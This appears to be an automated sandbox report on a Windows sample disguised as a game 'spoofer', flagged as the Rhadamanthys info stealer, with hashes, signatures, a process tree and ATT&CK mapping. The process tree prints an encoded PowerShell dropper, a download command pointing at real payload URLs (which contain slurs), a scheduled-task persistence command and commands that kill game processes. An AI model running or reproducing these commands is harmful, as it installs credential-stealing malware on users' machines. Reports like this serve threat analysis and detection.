Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-06-2024 19:56

General

  • Target

    Moon Spoofer/Moon Spoofer/Spoofer.exe

  • Size

    7KB

  • MD5

    960d70161f0ac1ddd8093955446bdcbc

  • SHA1

    5943c81939f9b43228e2fe2f65e90c54660ae47f

  • SHA256

    31e6573e37d06a71b3025c0e9ed4901093ed5262bc60bbbdf7ce1ed28ebb021a

  • SHA512

    8f3f6091fb3d09d4cdb0f9540bbbc2de0562dd5bb77c8446db49f274be7b173cbc0aa24206e25838cc6b6c6578440c0ecfd1a17acc94c50ebd014cbe16617c14

  • SSDEEP

    192:+9yqvjp73xsznGjcJr9emxan6mUqlwc6nYZKvkV/9dXq:+9Jv1dOnGjcJrQmxan6m/ec6nYZSkV/2

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/FUCKOFFNIGGA/raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/gedegrereghh/fuckyougithub/raw/37140025d15f5d49ec2bd023f7557f06268d7c49/pancake-unpacked.rar

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 8 IoCs
  • Kills process with taskkill 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2652
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:552
    • C:\Users\Admin\AppData\Local\Temp\Moon Spoofer\Moon Spoofer\Spoofer.exe
      "C:\Users\Admin\AppData\Local\Temp\Moon Spoofer\Moon Spoofer\Spoofer.exe"
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdABoACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawBtAG4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQBuAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABlAG0AIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAEYAVQBDAEsATwBGAEYATgBJAEcARwBBAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBkAHYAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AagBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAeQB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB6AHUAagAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBmAHcAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAagBtAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHkAYwBoACMAPgA="
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1288
        • C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe
          "C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:624
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4035.tmp\4036.tmp\4037.bat C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2704
            • C:\Windows\system32\chcp.com
              chcp 1251
              5⤵
                PID:3488
              • C:\Windows\system32\findstr.exe
                findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                5⤵
                  PID:4840
                • C:\Windows\system32\findstr.exe
                  findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
                  5⤵
                    PID:1980
                  • C:\Windows\system32\findstr.exe
                    findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
                    5⤵
                      PID:632
                    • C:\Windows\system32\schtasks.exe
                      schtasks /query /tn "MyBatchScript"
                      5⤵
                        PID:3960
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
                        5⤵
                        • Creates scheduled task(s)
                        PID:5052
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3044
                        • C:\Windows\system32\reg.exe
                          reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                          6⤵
                            PID:4380
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3620
                          • C:\Windows\system32\reg.exe
                            reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
                            6⤵
                              PID:4964
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/gedegrereghh/fuckyougithub/raw/37140025d15f5d49ec2bd023f7557f06268d7c49/pancake-unpacked.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
                            5⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4976
                          • C:\Windows\system32\tasklist.exe
                            tasklist
                            5⤵
                            • Enumerates processes with tasklist
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2588
                          • C:\Windows\system32\find.exe
                            find /i "tf_win64.exe"
                            5⤵
                              PID:532
                            • C:\Windows\system32\taskkill.exe
                              taskkill /f /im tf_win64.exe
                              5⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2392
                            • C:\Windows\system32\tasklist.exe
                              tasklist
                              5⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3320
                            • C:\Windows\system32\find.exe
                              find /i "dota2.exe"
                              5⤵
                                PID:2636
                              • C:\Windows\system32\taskkill.exe
                                taskkill /f /im dota2.exe
                                5⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3628
                              • C:\Windows\system32\tasklist.exe
                                tasklist
                                5⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2296
                              • C:\Windows\system32\find.exe
                                find /i "cs2.exe"
                                5⤵
                                  PID:4480
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /f /im cs2.exe
                                  5⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3836
                                • C:\Windows\system32\tasklist.exe
                                  tasklist
                                  5⤵
                                  • Enumerates processes with tasklist
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2872
                                • C:\Windows\system32\find.exe
                                  find /i "RustClient.exe"
                                  5⤵
                                    PID:4500
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /f /im RustClient.exe
                                    5⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4364
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist
                                    5⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5112
                                  • C:\Windows\system32\find.exe
                                    find /i "GTA5.exe"
                                    5⤵
                                      PID:4600
                                    • C:\Windows\system32\taskkill.exe
                                      taskkill /f /im GTA5.exe
                                      5⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4780
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist
                                      5⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3316
                                    • C:\Windows\system32\find.exe
                                      find /i "TslGame.exe"
                                      5⤵
                                        PID:3248
                                      • C:\Windows\system32\taskkill.exe
                                        taskkill /f /im TslGame.exe
                                        5⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4956
                                      • C:\Windows\system32\tasklist.exe
                                        tasklist
                                        5⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2036
                                      • C:\Windows\system32\find.exe
                                        find /i "RainbowSix.exe"
                                        5⤵
                                          PID:836
                                        • C:\Windows\system32\taskkill.exe
                                          taskkill /f /im RainbowSix.exe
                                          5⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3192
                                        • C:\Windows\system32\timeout.exe
                                          timeout /t 3
                                          5⤵
                                          • Delays execution with timeout.exe
                                          PID:1712
                                        • C:\Windows\system32\tasklist.exe
                                          tasklist
                                          5⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4004
                                        • C:\Windows\system32\find.exe
                                          find /i "steam.exe"
                                          5⤵
                                            PID:1128
                                          • C:\Windows\system32\taskkill.exe
                                            taskkill /f /im steam.exe
                                            5⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1816
                                          • C:\Windows\system32\timeout.exe
                                            timeout /t 3
                                            5⤵
                                            • Delays execution with timeout.exe
                                            PID:436
                                          • C:\Windows\system32\tar.exe
                                            tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
                                            5⤵
                                              PID:1520
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\Admin\Desktop\Steam.lnk'); $s.TargetPath = '\steam.exe'; $s.Save()"
                                              5⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5060
                                        • C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exe
                                          "C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exe"
                                          3⤵
                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of WriteProcessMemory
                                          PID:3172

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v13

                                    Execution

                                    Command and Scripting Interpreter

                                    1
                                    T1059

                                    PowerShell

                                    1
                                    T1059.001

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Persistence

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Privilege Escalation

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Discovery

                                    Query Registry

                                    2
                                    T1012

                                    System Information Discovery

                                    2
                                    T1082

                                    Process Discovery

                                    1
                                    T1057

                                    Command and Control

                                    Web Service

                                    1
                                    T1102

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                      Filesize

                                      3KB

                                      MD5

                                      556084f2c6d459c116a69d6fedcc4105

                                      SHA1

                                      633e89b9a1e77942d822d14de6708430a3944dbc

                                      SHA256

                                      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                      SHA512

                                      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      1KB

                                      MD5

                                      71444def27770d9071039d005d0323b7

                                      SHA1

                                      cef8654e95495786ac9347494f4417819373427e

                                      SHA256

                                      8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

                                      SHA512

                                      a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      1KB

                                      MD5

                                      0f6a3762a04bbb03336fb66a040afb97

                                      SHA1

                                      0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

                                      SHA256

                                      36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

                                      SHA512

                                      cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

                                    • C:\Users\Admin\AppData\Local\Temp\4035.tmp\4036.tmp\4037.bat
                                      Filesize

                                      6KB

                                      MD5

                                      5356df66c550e8bf737e23956f5a8406

                                      SHA1

                                      8f40c948922bcc96ee5bb79ad6ed71ac0369c7f9

                                      SHA256

                                      3b03eba10dc8cc18f1ffa3726d6ff3e242183da10b47c8217f0b3b79eee1b3c8

                                      SHA512

                                      abef71ab94f3821f5430d1f65902fc06b2bd73b6c2014d8c9fc5718e9241db5534f033a414d328d1f135d454f46d44986bc5cab52f2d8c828557d92e3976e7f4

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pli5ayhi.juk.ps1
                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Users\Admin\AppData\Roaming\tco23iyp.2sp0.exe
                                      Filesize

                                      126KB

                                      MD5

                                      2f6b6a51b8426be18badffd9294b0d9f

                                      SHA1

                                      2d4aaeffe325c93e61c38349d5a41fdb1b58c24f

                                      SHA256

                                      36d868815764b2c7b77ded962a02c2949db328a98ac714644e9426bb6d47fa1a

                                      SHA512

                                      3628f903a02fd27b049addfba2f936aee4d039f2c201438fd12d8bca58ab2dee852d3cfd54cd78fe9ec0b2ea86eb85c980dcea271e76e26a7588a4e8fc614d6c

                                    • C:\Users\Admin\AppData\Roaming\tco23iyp.2sp1.exe
                                      Filesize

                                      355KB

                                      MD5

                                      01a72f1659cfe71d56340773f3c89bf9

                                      SHA1

                                      b87d0a06df5896b9129efd823ea237905cfa9d1e

                                      SHA256

                                      7205faf5054589ce7dc6b68dcfea45c18859cb49a3c0d4bda840fc9d308152bd

                                      SHA512

                                      59e1de953a7bbb7f87da2de9c9575ba7c0098b31afc549c1eff2256ee9beddc590aec88d32716f386fd3a7037d610365d72bbded94278cd0d341ce337579d1e8

                                    • memory/552-60-0x0000000000B70000-0x0000000000B79000-memory.dmp
                                      Filesize

                                      36KB

                                    • memory/552-64-0x00007FFDEFAF0000-0x00007FFDEFCE5000-memory.dmp
                                      Filesize

                                      2.0MB

                                    • memory/552-66-0x00000000757D0000-0x00000000759E5000-memory.dmp
                                      Filesize

                                      2.1MB

                                    • memory/552-63-0x0000000002910000-0x0000000002D10000-memory.dmp
                                      Filesize

                                      4.0MB

                                    • memory/1288-14-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/1288-15-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/1288-41-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/1288-8-0x000002A32F660000-0x000002A32F682000-memory.dmp
                                      Filesize

                                      136KB

                                    • memory/1288-17-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/1288-13-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/1288-16-0x00007FFDD1A40000-0x00007FFDD2501000-memory.dmp
                                      Filesize

                                      10.8MB

                                    • memory/2768-1-0x00007FFDD1A43000-0x00007FFDD1A45000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/2768-0-0x0000000000B80000-0x0000000000B88000-memory.dmp
                                      Filesize

                                      32KB

                                    • memory/3172-61-0x0000000000E80000-0x0000000000EED000-memory.dmp
                                      Filesize

                                      436KB

                                    • memory/3172-56-0x0000000004120000-0x0000000004520000-memory.dmp
                                      Filesize

                                      4.0MB

                                    • memory/3172-40-0x0000000000E80000-0x0000000000EED000-memory.dmp
                                      Filesize

                                      436KB

                                    • memory/3172-55-0x0000000004120000-0x0000000004520000-memory.dmp
                                      Filesize

                                      4.0MB

                                    • memory/3172-59-0x00000000757D0000-0x00000000759E5000-memory.dmp
                                      Filesize

                                      2.1MB

                                    • memory/3172-57-0x00007FFDEFAF0000-0x00007FFDEFCE5000-memory.dmp
                                      Filesize

                                      2.0MB